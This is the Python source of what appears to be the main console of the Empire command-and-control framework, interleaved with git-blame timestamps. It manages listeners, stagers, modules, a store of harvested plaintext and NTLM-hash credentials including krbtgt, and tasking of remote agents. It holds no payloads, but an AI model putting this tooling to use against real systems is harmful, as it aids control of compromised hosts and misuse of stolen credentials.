2015-08-05 18:36:39 +00:00
|
|
|
"""
|
|
|
|
|
|
|
|
The main controller class for Empire.
|
|
|
|
|
|
|
|
This is what's launched from ./empire.
|
|
|
|
Contains the Main, Listener, Agents, Agent, and Module
|
|
|
|
menu loops.
|
|
|
|
|
|
|
|
"""
|
|
|
|
|
|
|
|
# make version for Empire
|
|
|
|
VERSION = "1.0.0"
|
|
|
|
|
|
|
|
|
|
|
|
from pydispatch import dispatcher
|
|
|
|
|
|
|
|
# import time, sys, re, readline
|
|
|
|
import sys, cmd, sqlite3, os, hashlib
|
|
|
|
|
|
|
|
# Empire imports
|
|
|
|
import helpers
|
|
|
|
import http
|
|
|
|
import encryption
|
|
|
|
import packets
|
|
|
|
import messages
|
|
|
|
import agents
|
|
|
|
import listeners
|
|
|
|
import modules
|
|
|
|
import stagers
|
|
|
|
import credentials
|
|
|
|
import time
|
|
|
|
|
|
|
|
|
|
|
|
class MainMenu(cmd.Cmd):
|
|
|
|
|
|
|
|
def __init__(self, args=None):
|
|
|
|
|
|
|
|
cmd.Cmd.__init__(self)
|
|
|
|
|
|
|
|
# globalOptions[optionName] = (value, required, description)
|
|
|
|
self.globalOptions = {}
|
|
|
|
|
|
|
|
self.args = args
|
|
|
|
|
|
|
|
# empty database object
|
|
|
|
self.conn = self.database_connect()
|
|
|
|
|
|
|
|
# grab the universal install path
|
|
|
|
# TODO: combine these into one query
|
|
|
|
cur = self.conn.cursor()
|
|
|
|
cur.execute("SELECT install_path FROM config")
|
|
|
|
self.installPath = cur.fetchone()[0]
|
|
|
|
cur.close()
|
|
|
|
|
|
|
|
# pull out the stage0 uri
|
|
|
|
cur = self.conn.cursor()
|
|
|
|
cur.execute("SELECT stage0_uri FROM config")
|
|
|
|
self.stage0 = cur.fetchone()[0]
|
|
|
|
cur.close()
|
|
|
|
|
|
|
|
# pull out the stage1 uri
|
|
|
|
cur = self.conn.cursor()
|
|
|
|
cur.execute("SELECT stage1_uri FROM config")
|
|
|
|
self.stage1 = cur.fetchone()[0]
|
|
|
|
cur.close()
|
|
|
|
|
|
|
|
# pull out the stage2 uri
|
|
|
|
cur = self.conn.cursor()
|
|
|
|
cur.execute("SELECT stage2_uri FROM config")
|
|
|
|
self.stage2 = cur.fetchone()[0]
|
|
|
|
cur.close()
|
|
|
|
|
|
|
|
# pull out the IP whitelist and create it, if applicable
|
|
|
|
cur = self.conn.cursor()
|
|
|
|
cur.execute("SELECT ip_whitelist FROM config")
|
|
|
|
self.ipWhiteList = helpers.generate_ip_list(cur.fetchone()[0])
|
|
|
|
cur.close()
|
|
|
|
|
|
|
|
# pull out the IP blacklist and create it, if applicable
|
|
|
|
cur = self.conn.cursor()
|
|
|
|
cur.execute("SELECT ip_blacklist FROM config")
|
|
|
|
self.ipBlackList = helpers.generate_ip_list(cur.fetchone()[0])
|
|
|
|
cur.close()
|
|
|
|
|
|
|
|
# instantiate the agents, listeners, and stagers objects
|
|
|
|
self.agents = agents.Agents(self, args=args)
|
|
|
|
self.listeners = listeners.Listeners(self, args=args)
|
|
|
|
self.stagers = stagers.Stagers(self, args=args)
|
|
|
|
self.modules = modules.Modules(self, args=args)
|
|
|
|
self.credentials = credentials.Credentials(self, args=args)
|
|
|
|
|
|
|
|
# make sure all the references are passed after instantiation
|
|
|
|
# TODO: replace these with self?
|
|
|
|
self.agents.listeners = self.listeners
|
|
|
|
self.agents.modules = self.modules
|
|
|
|
self.agents.stagers = self.stagers
|
|
|
|
self.listeners.modules = self.modules
|
|
|
|
self.listeners.stagers = self.stagers
|
|
|
|
self.modules.stagers = self.stagers
|
|
|
|
|
|
|
|
# change the default prompt for the user
|
|
|
|
self.prompt = "(Empire) > "
|
|
|
|
self.do_help.__func__.__doc__ = '''Displays the help menu.'''
|
|
|
|
self.doc_header = 'Commands'
|
|
|
|
|
|
|
|
dispatcher.connect( self.handle_event, sender=dispatcher.Any )
|
|
|
|
|
|
|
|
# start everything up
|
|
|
|
self.startup()
|
|
|
|
|
|
|
|
|
|
|
|
def startup(self):
|
|
|
|
"""
|
|
|
|
Kick off all initial startup actions.
|
|
|
|
"""
|
|
|
|
|
|
|
|
self.database_connect()
|
|
|
|
|
|
|
|
# restart any listeners currently in the database
|
|
|
|
self.listeners.start_existing_listeners()
|
|
|
|
|
|
|
|
# display the main title
|
|
|
|
messages.title(VERSION)
|
|
|
|
|
|
|
|
# get active listeners, agents, and loaded modules
|
|
|
|
num_agents = self.agents.get_agents()
|
|
|
|
if(num_agents):
|
|
|
|
num_agents = len(num_agents)
|
|
|
|
else:
|
|
|
|
num_agents = 0
|
|
|
|
|
|
|
|
num_modules = self.modules.modules
|
|
|
|
if(num_modules):
|
|
|
|
num_modules = len(num_modules)
|
|
|
|
else:
|
|
|
|
num_modules = 0
|
|
|
|
|
|
|
|
num_listeners = self.listeners.listeners
|
|
|
|
if(num_listeners):
|
|
|
|
num_listeners = len(num_listeners)
|
|
|
|
else:
|
|
|
|
num_listeners = 0
|
|
|
|
|
|
|
|
print " " + helpers.color(str(num_modules), "green") + " modules currently loaded\n"
|
|
|
|
print " " + helpers.color(str(num_listeners), "green") + " listeners currently active\n"
|
|
|
|
print " " + helpers.color(str(num_agents), "green") + " agents currently active\n\n"
|
|
|
|
|
|
|
|
dispatcher.send("[*] Empire starting up...", sender="Empire")
|
|
|
|
|
|
|
|
|
|
|
|
def shutdown(self):
|
|
|
|
"""
|
|
|
|
Perform any shutdown actions.
|
|
|
|
"""
|
|
|
|
|
|
|
|
print "\n" + helpers.color("[!] Shutting down...\n")
|
|
|
|
# self.server.shutdown()
|
|
|
|
dispatcher.send("[*] Empire shutting down...", sender="Empire")
|
|
|
|
|
|
|
|
# enumerate all active servers/listeners and shut them down
|
|
|
|
self.listeners.shutdownall()
|
|
|
|
|
|
|
|
# shutdown the database connection object
|
|
|
|
if self.conn:
|
|
|
|
self.conn.close()
|
|
|
|
|
|
|
|
|
|
|
|
def database_connect(self):
|
|
|
|
try:
|
|
|
|
# set the database connectiont to autocommit w/ isolation level
|
|
|
|
self.conn = sqlite3.connect('./data/empire.db', check_same_thread=False)
|
|
|
|
self.conn.isolation_level = None
|
|
|
|
return self.conn
|
|
|
|
|
|
|
|
except Exception as e:
|
|
|
|
print helpers.color("[!] Could not connect to database")
|
|
|
|
print helpers.color("[!] Please run database_setup.py")
|
|
|
|
sys.exit()
|
|
|
|
|
|
|
|
|
|
|
|
def cmdloop(self):
|
|
|
|
try:
|
|
|
|
cmd.Cmd.cmdloop(self)
|
|
|
|
|
|
|
|
# handle those pesky ctrl+c's
|
|
|
|
except KeyboardInterrupt as e:
|
|
|
|
|
|
|
|
try:
|
|
|
|
choice = raw_input(helpers.color("\n[>] Exit? [y/N] ", "red"))
|
|
|
|
if choice.lower() != "" and choice.lower()[0] == "y":
|
|
|
|
self.shutdown()
|
|
|
|
return True
|
|
|
|
else:
|
|
|
|
self.cmdloop()
|
|
|
|
except KeyboardInterrupt as e:
|
|
|
|
print ""
|
|
|
|
self.cmdloop()
|
|
|
|
|
|
|
|
# catch any signaled breaks back to the main menu
|
|
|
|
except StopIteration as e:
|
|
|
|
self.cmdloop()
|
|
|
|
|
|
|
|
# if an exit signal is raised anywhere in the code
|
|
|
|
except SystemExit as e:
|
|
|
|
# confirm that we want to exit
|
|
|
|
try:
|
|
|
|
choice = raw_input(helpers.color("[>] Exit Empire? [y/N] ", "red"))
|
|
|
|
if choice.lower() != "" and choice.lower()[0] == "y":
|
|
|
|
self.shutdown()
|
|
|
|
return True
|
|
|
|
else:
|
|
|
|
self.cmdloop()
|
|
|
|
except KeyboardInterrupt as e:
|
|
|
|
self.cmdloop()
|
|
|
|
|
|
|
|
|
|
|
|
# print a nicely formatted help menu
|
|
|
|
# stolen/adapted from recon-ng
|
|
|
|
def print_topics(self, header, cmds, cmdlen, maxcol):
|
|
|
|
if cmds:
|
|
|
|
self.stdout.write("%s\n"%str(header))
|
|
|
|
if self.ruler:
|
|
|
|
self.stdout.write("%s\n"%str(self.ruler * len(header)))
|
|
|
|
for cmd in cmds:
|
|
|
|
self.stdout.write("%s %s\n" % (cmd.ljust(17), getattr(self, 'do_' + cmd).__doc__))
|
|
|
|
self.stdout.write("\n")
|
|
|
|
|
|
|
|
|
|
|
|
def emptyline(self): pass
|
|
|
|
|
|
|
|
|
|
|
|
def handle_event(self, signal, sender):
|
|
|
|
"""
|
|
|
|
Default event handler.
|
|
|
|
|
|
|
|
Signal Senders:
|
|
|
|
Empire - the main Empire controller (this file)
|
|
|
|
Agents - the Agents handler
|
|
|
|
Listeners - the Listeners handler
|
|
|
|
HttpHandler - the HTTP handler
|
|
|
|
EmpireServer - the Empire HTTP server
|
|
|
|
"""
|
|
|
|
|
|
|
|
# if --debug is passed, log out all dispatcher signals
|
|
|
|
if self.args.debug:
|
|
|
|
f = open("empire.debug", 'a')
|
|
|
|
f.write(helpers.get_datetime() + " " + sender + " : " + signal + "\n")
|
|
|
|
f.close()
|
|
|
|
|
|
|
|
# display specific signals from the agents.
|
|
|
|
if sender == "Agents":
|
|
|
|
if "[+] Initial agent" in signal:
|
|
|
|
print helpers.color(signal)
|
|
|
|
|
|
|
|
elif "[!] Agent" in signal and "exiting" in signal:
|
|
|
|
print helpers.color(signal)
|
|
|
|
|
|
|
|
elif "on the blacklist" in signal:
|
|
|
|
print helpers.color(signal)
|
|
|
|
|
|
|
|
elif sender == "EmpireServer":
|
|
|
|
if "[!] Error starting listener" in signal:
|
|
|
|
print helpers.color(signal)
|
|
|
|
|
|
|
|
elif sender == "Listeners":
|
|
|
|
print helpers.color(signal)
|
|
|
|
|
|
|
|
|
|
|
|
###################################################
|
|
|
|
# CMD methods
|
|
|
|
###################################################
|
|
|
|
|
|
|
|
def default(self, line):
|
|
|
|
pass
|
|
|
|
|
|
|
|
|
|
|
|
def do_exit(self, line):
|
|
|
|
"Exit Empire"
|
|
|
|
raise SystemExit
|
|
|
|
|
|
|
|
|
|
|
|
def do_agents(self, line):
|
|
|
|
"Jump to the Agents menu."
|
|
|
|
a = AgentsMenu(self)
|
|
|
|
a.cmdloop()
|
|
|
|
|
|
|
|
|
|
|
|
def do_listeners(self, line):
|
|
|
|
"Interact with active listeners."
|
|
|
|
l = ListenerMenu(self)
|
|
|
|
l.cmdloop()
|
|
|
|
|
|
|
|
|
|
|
|
def do_usestager(self, line):
|
|
|
|
"Use an Empire stager."
|
|
|
|
|
|
|
|
parts = line.split(" ")
|
|
|
|
|
|
|
|
if parts[0] not in self.stagers.stagers:
|
|
|
|
print helpers.color("[!] Error: invalid stager module")
|
|
|
|
|
|
|
|
elif len(parts) == 1:
|
|
|
|
l = StagerMenu(self, parts[0])
|
|
|
|
l.cmdloop()
|
|
|
|
elif len(parts) == 2:
|
|
|
|
listener = parts[1]
|
|
|
|
if not self.listeners.is_listener_valid(listener):
|
|
|
|
print helpers.color("[!] Please enter a valid listener name or ID")
|
|
|
|
else:
|
|
|
|
self.stagers.set_stager_option('Listener', listener)
|
|
|
|
l = StagerMenu(self, parts[0])
|
|
|
|
l.cmdloop()
|
|
|
|
else:
|
|
|
|
print helpers.color("[!] Error in MainMenu's do_userstager()")
|
|
|
|
|
|
|
|
|
|
|
|
def do_usemodule(self, line):
|
|
|
|
"Use an Empire module."
|
|
|
|
if line not in self.modules.modules:
|
|
|
|
print helpers.color("[!] Error: invalid module")
|
|
|
|
else:
|
|
|
|
l = ModuleMenu(self, line)
|
|
|
|
l.cmdloop()
|
|
|
|
|
|
|
|
|
|
|
|
def do_searchmodule(self, line):
|
|
|
|
"Search Empire module names/descriptions."
|
|
|
|
|
|
|
|
searchTerm = line.strip()
|
|
|
|
|
|
|
|
if searchTerm.strip() == "":
|
|
|
|
print helpers.color("[!] Please enter a search term.")
|
|
|
|
else:
|
|
|
|
self.modules.search_modules(searchTerm)
|
|
|
|
|
|
|
|
|
|
|
|
def do_creds(self, line):
|
|
|
|
"Add/display credentials to/from the database."
|
|
|
|
|
|
|
|
filterTerm = line.strip()
|
|
|
|
|
|
|
|
if filterTerm == "":
|
|
|
|
creds = self.credentials.get_credentials()
|
|
|
|
|
|
|
|
elif filterTerm.split()[0].lower() == "add":
|
|
|
|
|
|
|
|
# add format: "domain username password <notes> <credType> <sid>
|
|
|
|
args = filterTerm.split()[1:]
|
|
|
|
|
|
|
|
if len(args) == 3:
|
|
|
|
domain, username, password = args
|
|
|
|
if helpers.validate_ntlm(password):
|
|
|
|
# credtype, domain, username, password, host, sid="", notes=""):
|
|
|
|
self.credentials.add_credential("hash", domain, username, password, "")
|
|
|
|
else:
|
|
|
|
self.credentials.add_credential("plaintext", domain, username, password, "")
|
|
|
|
|
|
|
|
elif len(args) == 4:
|
|
|
|
domain, username, password, notes = args
|
|
|
|
if helpers.validate_ntlm(password):
|
|
|
|
self.credentials.add_credential("hash", domain, username, password, "", notes=notes)
|
|
|
|
else:
|
|
|
|
self.credentials.add_credential("plaintext", domain, username, password, "", notes=notes)
|
|
|
|
|
|
|
|
elif len(args) == 5:
|
|
|
|
domain, username, password, notes, credType = args
|
|
|
|
self.credentials.add_credential(credType, domain, username, password, "", notes=notes)
|
|
|
|
|
|
|
|
elif len(args) == 6:
|
|
|
|
domain, username, password, notes, credType, sid = args
|
|
|
|
self.credentials.add_credential(credType, domain, username, password, "", sid=sid, notes=notes)
|
|
|
|
|
|
|
|
else:
|
|
|
|
print helpers.color("[!] Format is 'add domain username password <notes> <credType> <sid>")
|
|
|
|
return
|
|
|
|
|
|
|
|
creds = self.credentials.get_credentials()
|
|
|
|
|
|
|
|
elif filterTerm.split()[0].lower() == "remove":
|
|
|
|
|
|
|
|
try:
|
|
|
|
args = filterTerm.split()[1:]
|
|
|
|
if len(args) != 1 :
|
|
|
|
print helpers.color("[!] Format is 'remove <credID>/<credID-credID>/all'")
|
|
|
|
else:
|
|
|
|
if args[0].lower() == "all":
|
|
|
|
choice = raw_input(helpers.color("[>] Remove all credentials from the database? [y/N] ", "red"))
|
|
|
|
if choice.lower() != "" and choice.lower()[0] == "y":
|
|
|
|
self.credentials.remove_all_credentials()
|
|
|
|
else:
|
|
|
|
if "," in args[0]:
|
|
|
|
credIDs = args[0].split(",")
|
|
|
|
self.credentials.remove_credentials(credIDs)
|
|
|
|
elif "-" in args[0]:
|
|
|
|
parts = args[0].split("-")
|
|
|
|
credIDs = [x for x in xrange(int(parts[0]), int(parts[1])+1)]
|
|
|
|
self.credentials.remove_credentials(credIDs)
|
|
|
|
else:
|
|
|
|
self.credentials.remove_credentials(args)
|
|
|
|
|
|
|
|
except:
|
|
|
|
print helpers.color("[!] Error in remove command parsing.")
|
|
|
|
print helpers.color("[!] Format is 'remove <credID>/<credID-credID>/all'")
|
|
|
|
|
|
|
|
return
|
|
|
|
|
|
|
|
|
|
|
|
elif filterTerm.split()[0].lower() == "export":
|
|
|
|
args = filterTerm.split()[1:]
|
|
|
|
|
|
|
|
if len(args) != 1:
|
|
|
|
print helpers.color("[!] Please supply an output filename/filepath.")
|
|
|
|
return
|
|
|
|
else:
|
|
|
|
creds = self.credentials.get_credentials()
|
|
|
|
|
|
|
|
if len(creds) == 0:
|
|
|
|
print helpers.color("[!] No credentials in the database.")
|
|
|
|
return
|
|
|
|
|
|
|
|
f = open(args[0], 'w')
|
|
|
|
f.write("CredID,CredType,Domain,Username,Password,Host,SID,Notes\n")
|
|
|
|
for cred in creds:
|
|
|
|
f.write(",".join([str(x) for x in cred]) + "\n")
|
|
|
|
|
|
|
|
print "\n" + helpers.color("[*] Credentials exported to %s.\n" % (args[0]))
|
|
|
|
return
|
|
|
|
|
|
|
|
elif filterTerm.split()[0].lower() == "plaintext":
|
|
|
|
creds = self.credentials.get_credentials(credtype="plaintext")
|
|
|
|
|
|
|
|
elif filterTerm.split()[0].lower() == "hash":
|
|
|
|
creds = self.credentials.get_credentials(credtype="hash")
|
|
|
|
|
|
|
|
elif filterTerm.split()[0].lower() == "krbtgt":
|
|
|
|
creds = self.credentials.get_krbtgt()
|
|
|
|
|
|
|
|
else:
|
|
|
|
creds = self.credentials.get_credentials(filterTerm=filterTerm)
|
|
|
|
|
|
|
|
messages.display_credentials(creds)
|
|
|
|
|
|
|
|
|
|
|
|
def do_set(self, line):
|
|
|
|
"Set a global option (e.g. IP whitelists)."
|
|
|
|
|
|
|
|
parts = line.split(" ")
|
|
|
|
if len(parts) == 1:
|
|
|
|
print helpers.color("[!] Please enter 'IP,IP-IP,IP/CIDR' or a file path.")
|
|
|
|
else:
|
|
|
|
if parts[0].lower() == "ip_whitelist":
|
|
|
|
if parts[1] != "" and os.path.exists(parts[1]):
|
|
|
|
f = open(parts[1], 'r')
|
|
|
|
ipData = f.read()
|
|
|
|
f.close()
|
2015-08-10 11:53:22 +00:00
|
|
|
self.agents.ipWhiteList = helpers.generate_ip_list(ipData)
|
2015-08-05 18:36:39 +00:00
|
|
|
else:
|
|
|
|
self.agents.ipWhiteList = helpers.generate_ip_list(",".join(parts[1:]))
|
|
|
|
elif parts[0].lower() == "ip_blacklist":
|
|
|
|
if parts[1] != "" and os.path.exists(parts[1]):
|
|
|
|
f = open(parts[1], 'r')
|
|
|
|
ipData = f.read()
|
|
|
|
f.close()
|
|
|
|
self.agents.ipBlackList = helpers.generate_ip_list(ipData)
|
|
|
|
else:
|
|
|
|
self.agents.ipBlackList = helpers.generate_ip_list(",".join(parts[1:]))
|
|
|
|
else:
|
|
|
|
print helpers.color("[!] Please choose 'ip_whitelist' or 'ip_blacklist'")
|
|
|
|
|
|
|
|
|
|
|
|
def do_reset(self, line):
|
|
|
|
"Reset a global option (e.g. IP whitelists)."
|
|
|
|
|
|
|
|
if line.strip().lower() == "ip_whitelist":
|
|
|
|
self.agents.ipWhiteList = None
|
|
|
|
if line.strip().lower() == "ip_blacklist":
|
|
|
|
self.agents.ipBlackList = None
|
|
|
|
|
|
|
|
|
|
|
|
def do_show(self, line):
|
|
|
|
"Show a global option (e.g. IP whitelists)."
|
|
|
|
|
|
|
|
if line.strip().lower() == "ip_whitelist":
|
|
|
|
print self.agents.ipWhiteList
|
|
|
|
if line.strip().lower() == "ip_blacklist":
|
|
|
|
print self.agents.ipBlackList
|
|
|
|
|
|
|
|
|
|
|
|
def do_reload(self, line):
|
|
|
|
"Reload one (or all) Empire modules."
|
|
|
|
|
|
|
|
if line.strip().lower() == "all":
|
|
|
|
# reload all modules
|
|
|
|
print "\n" + helpers.color("[*] Reloading all modules.") + "\n"
|
|
|
|
self.modules.load_modules()
|
|
|
|
else:
|
|
|
|
if line.strip() not in self.modules.modules:
|
|
|
|
print helpers.color("[!] Error: invalid module")
|
|
|
|
else:
|
|
|
|
print "\n" + helpers.color("[*] Reloading module: " + line) + "\n"
|
|
|
|
self.modules.reload_module(line)
|
|
|
|
|
|
|
|
|
|
|
|
def complete_usemodule(self, text, line, begidx, endidx):
|
|
|
|
"Tab-complete an Empire PowerShell module path."
|
|
|
|
|
|
|
|
modules = self.modules.modules.keys()
|
|
|
|
|
|
|
|
mline = line.partition(' ')[2]
|
|
|
|
offs = len(mline) - len(text)
|
|
|
|
return [s[offs:] for s in modules if s.startswith(mline)]
|
|
|
|
|
|
|
|
|
|
|
|
def complete_reload(self, text, line, begidx, endidx):
|
|
|
|
"Tab-complete an Empire PowerShell module path."
|
|
|
|
|
|
|
|
modules = self.modules.modules.keys() + ["all"]
|
|
|
|
|
|
|
|
mline = line.partition(' ')[2]
|
|
|
|
offs = len(mline) - len(text)
|
|
|
|
return [s[offs:] for s in modules if s.startswith(mline)]
|
|
|
|
|
|
|
|
|
|
|
|
def complete_usestager(self, text, line, begidx, endidx):
|
|
|
|
"Tab-complete an Empire stager module path."
|
|
|
|
|
|
|
|
stagers = self.stagers.stagers.keys()
|
|
|
|
|
2015-08-10 13:06:13 +00:00
|
|
|
if (line.split(" ")[1].lower() in stagers) and line.endswith(" "):
|
2015-08-05 18:36:39 +00:00
|
|
|
# if we already have a stager name, tab-complete listener names
|
|
|
|
listenerNames = self.listeners.get_listener_names()
|
|
|
|
|
|
|
|
endLine = " ".join(line.split(" ")[1:])
|
|
|
|
mline = endLine.partition(' ')[2]
|
|
|
|
offs = len(mline) - len(text)
|
|
|
|
return [s[offs:] for s in listenerNames if s.startswith(mline)]
|
|
|
|
else:
|
|
|
|
# otherwise tab-complate the stager names
|
|
|
|
mline = line.partition(' ')[2]
|
|
|
|
offs = len(mline) - len(text)
|
|
|
|
return [s[offs:] for s in stagers if s.startswith(mline)]
|
|
|
|
|
|
|
|
|
|
|
|
def complete_set(self, text, line, begidx, endidx):
|
|
|
|
"Tab-complete a global option."
|
|
|
|
|
|
|
|
options = ["ip_whitelist", "ip_blacklist"]
|
|
|
|
|
|
|
|
if line.split(" ")[1].lower() in options:
|
|
|
|
return helpers.complete_path(text,line,arg=True)
|
|
|
|
|
|
|
|
mline = line.partition(' ')[2]
|
|
|
|
offs = len(mline) - len(text)
|
|
|
|
return [s[offs:] for s in options if s.startswith(mline)]
|
|
|
|
|
|
|
|
|
|
|
|
def complete_reset(self, text, line, begidx, endidx):
|
|
|
|
"Tab-complete a global option."
|
|
|
|
|
|
|
|
return self.complete_set(text, line, begidx, endidx)
|
|
|
|
|
|
|
|
|
|
|
|
def complete_show(self, text, line, begidx, endidx):
|
|
|
|
"Tab-complete a global option."
|
|
|
|
|
|
|
|
return self.complete_set(text, line, begidx, endidx)
|
|
|
|
|
|
|
|
|
|
|
|
def complete_creds(self, text, line, begidx, endidx):
|
|
|
|
"Tab-complete 'creds' commands."
|
|
|
|
|
|
|
|
commands = [ "add", "remove", "export", "hash", "plaintext", "krbtgt"]
|
|
|
|
|
|
|
|
mline = line.partition(' ')[2]
|
|
|
|
offs = len(mline) - len(text)
|
|
|
|
return [s[offs:] for s in commands if s.startswith(mline)]
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
class AgentsMenu(cmd.Cmd):
|
|
|
|
|
|
|
|
def __init__(self, mainMenu):
|
|
|
|
cmd.Cmd.__init__(self)
|
|
|
|
|
|
|
|
self.mainMenu = mainMenu
|
|
|
|
|
|
|
|
self.doc_header = 'Commands'
|
|
|
|
|
|
|
|
# set the prompt text
|
|
|
|
self.prompt = '(Empire: '+helpers.color("agents", color="blue")+') > '
|
|
|
|
|
|
|
|
agents = self.mainMenu.agents.get_agents()
|
|
|
|
messages.display_agents(agents)
|
|
|
|
|
|
|
|
|
|
|
|
# print a nicely formatted help menu
|
|
|
|
# stolen/adapted from recon-ng
|
|
|
|
def print_topics(self, header, cmds, cmdlen, maxcol):
|
|
|
|
if cmds:
|
|
|
|
self.stdout.write("%s\n"%str(header))
|
|
|
|
if self.ruler:
|
|
|
|
self.stdout.write("%s\n"%str(self.ruler * len(header)))
|
|
|
|
for cmd in cmds:
|
|
|
|
self.stdout.write("%s %s\n" % (cmd.ljust(17), getattr(self, 'do_' + cmd).__doc__))
|
|
|
|
self.stdout.write("\n")
|
|
|
|
|
|
|
|
|
|
|
|
def emptyline(self): pass
|
|
|
|
|
|
|
|
|
|
|
|
def do_back(self, line):
|
|
|
|
"Return back a menu."
|
|
|
|
return True
|
|
|
|
|
|
|
|
|
|
|
|
def do_main(self, line):
|
|
|
|
"Go back to the main menu."
|
|
|
|
raise StopIteration
|
|
|
|
|
|
|
|
|
|
|
|
def do_exit(self, line):
|
|
|
|
"Exit Empire."
|
|
|
|
raise SystemExit
|
|
|
|
|
|
|
|
|
|
|
|
def do_list(self, line):
|
|
|
|
"Lists all active agents."
|
|
|
|
|
|
|
|
agents = self.mainMenu.agents.get_agents()
|
|
|
|
|
|
|
|
if line.strip() != "":
|
|
|
|
# if we're listing an agents active in the last X minutes
|
|
|
|
try:
|
|
|
|
minutes = int(line.strip())
|
|
|
|
|
|
|
|
# grab just the agents active within the specified window (in minutes)
|
|
|
|
displayAgents = []
|
|
|
|
for agent in agents:
|
|
|
|
agentTime = time.mktime(time.strptime(agent[16],"%Y-%m-%d %H:%M:%S"))
|
|
|
|
|
|
|
|
if agentTime > time.mktime(time.localtime()) - (int(minutes) * 60):
|
|
|
|
displayAgents.append(agent)
|
|
|
|
|
|
|
|
messages.display_agents(displayAgents)
|
|
|
|
|
|
|
|
except:
|
|
|
|
print helpers.color("[!] Please enter the minute window for agent checkin.")
|
|
|
|
|
|
|
|
else:
|
|
|
|
messages.display_agents(agents)
|
|
|
|
|
|
|
|
|
|
|
|
def do_rename(self, line):
|
|
|
|
"Rename a particular agent."
|
|
|
|
|
|
|
|
parts = line.strip().split(" ")
|
|
|
|
|
|
|
|
# name sure we get an old name and new name for the agent
|
|
|
|
if len(parts) == 2:
|
|
|
|
# replace the old name with the new name
|
|
|
|
oldname = parts[0]
|
|
|
|
newname = parts[1]
|
|
|
|
self.mainMenu.agents.rename_agent(parts[0], parts[1])
|
|
|
|
else:
|
|
|
|
print helpers.color("[!] Please enter an agent name and new name")
|
|
|
|
|
|
|
|
|
|
|
|
def do_interact(self, line):
|
|
|
|
"Interact with a particular agent."
|
|
|
|
|
|
|
|
name = line.strip()
|
|
|
|
|
|
|
|
if name != "" and self.mainMenu.agents.is_agent_present(name):
|
|
|
|
# resolve the passed name to a sessionID
|
|
|
|
sessionID = self.mainMenu.agents.get_agent_id(name)
|
|
|
|
|
|
|
|
a = AgentMenu(self.mainMenu, sessionID)
|
|
|
|
a.cmdloop()
|
|
|
|
else:
|
|
|
|
print helpers.color("[!] Please enter a valid agent name")
|
|
|
|
|
|
|
|
|
|
|
|
def do_kill(self, line):
|
|
|
|
"Task one or more agents to exit."
|
|
|
|
|
|
|
|
name = line.strip()
|
|
|
|
|
|
|
|
if name.lower() == "all":
|
|
|
|
try:
|
|
|
|
choice = raw_input(helpers.color("[>] Kill all agents? [y/N] ", "red"))
|
|
|
|
if choice.lower() != "" and choice.lower()[0] == "y":
|
|
|
|
agents = self.mainMenu.agents.get_agents()
|
|
|
|
for agent in agents:
|
|
|
|
sessionID = agent[1]
|
|
|
|
self.mainMenu.agents.add_agent_task(sessionID, "TASK_EXIT")
|
|
|
|
except KeyboardInterrupt as e: print ""
|
|
|
|
|
|
|
|
else:
|
|
|
|
# extract the sessionID and clear the agent tasking
|
|
|
|
sessionID = self.mainMenu.agents.get_agent_id(name)
|
|
|
|
|
|
|
|
if sessionID and len(sessionID) != 0:
|
|
|
|
self.mainMenu.agents.add_agent_task(sessionID, "TASK_EXIT")
|
|
|
|
else:
|
|
|
|
print helpers.color("[!] Invalid agent name")
|
|
|
|
|
|
|
|
|
|
|
|
def do_creds(self, line):
|
|
|
|
"Display/return credentials from the database."
|
|
|
|
self.mainMenu.do_creds(line)
|
|
|
|
|
|
|
|
|
|
|
|
def do_clear(self, line):
|
|
|
|
"Clear one or more agent's taskings."
|
|
|
|
|
|
|
|
name = line.strip()
|
|
|
|
|
|
|
|
if name.lower() == "all":
|
|
|
|
self.mainMenu.agents.clear_agent_tasks("all")
|
|
|
|
else:
|
|
|
|
# extract the sessionID and clear the agent tasking
|
|
|
|
sessionID = self.mainMenu.agents.get_agent_id(name)
|
|
|
|
|
|
|
|
if sessionID and len(sessionID) != 0:
|
|
|
|
self.mainMenu.agents.clear_agent_tasks(sessionID)
|
|
|
|
else:
|
|
|
|
print helpers.color("[!] Invalid agent name")
|
|
|
|
|
|
|
|
|
|
|
|
def do_sleep(self, line):
|
|
|
|
"Task one or more agents to 'sleep [agent/all] interval [jitter]'"
|
|
|
|
|
|
|
|
parts = line.strip().split(" ")
|
|
|
|
|
|
|
|
if len(parts) == 1:
|
|
|
|
print helpers.color("[!] Please enter 'interval [jitter]'")
|
|
|
|
|
|
|
|
elif parts[0].lower() == "all":
|
|
|
|
delay = parts[1]
|
|
|
|
jitter = 0.0
|
|
|
|
if len(parts) == 3:
|
|
|
|
jitter = parts[2]
|
|
|
|
|
|
|
|
agents = self.mainMenu.agents.get_agents()
|
|
|
|
|
|
|
|
for agent in agents:
|
|
|
|
sessionID = agent[1]
|
|
|
|
# update this agent info in the database
|
|
|
|
self.mainMenu.agents.set_agent_field("delay", delay, sessionID)
|
|
|
|
self.mainMenu.agents.set_agent_field("jitter", jitter, sessionID)
|
|
|
|
# task the agent
|
|
|
|
self.mainMenu.agents.add_agent_task(sessionID, "TASK_SHELL", "Set-Delay " + str(delay) + " " + str(jitter))
|
|
|
|
# update the agent log
|
|
|
|
msg = "Tasked agent to delay sleep/jitter " + str(delay) + "/" + str(jitter)
|
|
|
|
self.mainMenu.agents.save_agent_log(sessionID, msg)
|
|
|
|
|
|
|
|
else:
|
|
|
|
# extract the sessionID and clear the agent tasking
|
|
|
|
sessionID = self.mainMenu.agents.get_agent_id(parts[0])
|
|
|
|
|
|
|
|
delay = parts[1]
|
|
|
|
jitter = 0.0
|
|
|
|
if len(parts) == 3:
|
|
|
|
jitter = parts[2]
|
|
|
|
|
|
|
|
if sessionID and len(sessionID) != 0:
|
|
|
|
# update this agent's information in the database
|
|
|
|
self.mainMenu.agents.set_agent_field("delay", delay, sessionID)
|
|
|
|
self.mainMenu.agents.set_agent_field("jitter", jitter, sessionID)
|
|
|
|
|
|
|
|
self.mainMenu.agents.add_agent_task(sessionID, "TASK_SHELL", "Set-Delay " + str(delay) + " " + str(jitter))
|
|
|
|
# update the agent log
|
|
|
|
msg = "Tasked agent to delay sleep/jitter " + str(delay) + "/" + str(jitter)
|
|
|
|
self.mainMenu.agents.save_agent_log(sessionID, msg)
|
|
|
|
|
|
|
|
else:
|
|
|
|
print helpers.color("[!] Invalid agent name")
|
|
|
|
|
2015-08-10 22:50:18 +00:00
|
|
|
def do_lostlimit(self, line):
|
|
|
|
"Task one or more agents to 'lostlimit [agent/all] <#ofCBs> '"
|
2015-08-10 02:18:02 +00:00
|
|
|
|
|
|
|
parts = line.strip().split(" ")
|
|
|
|
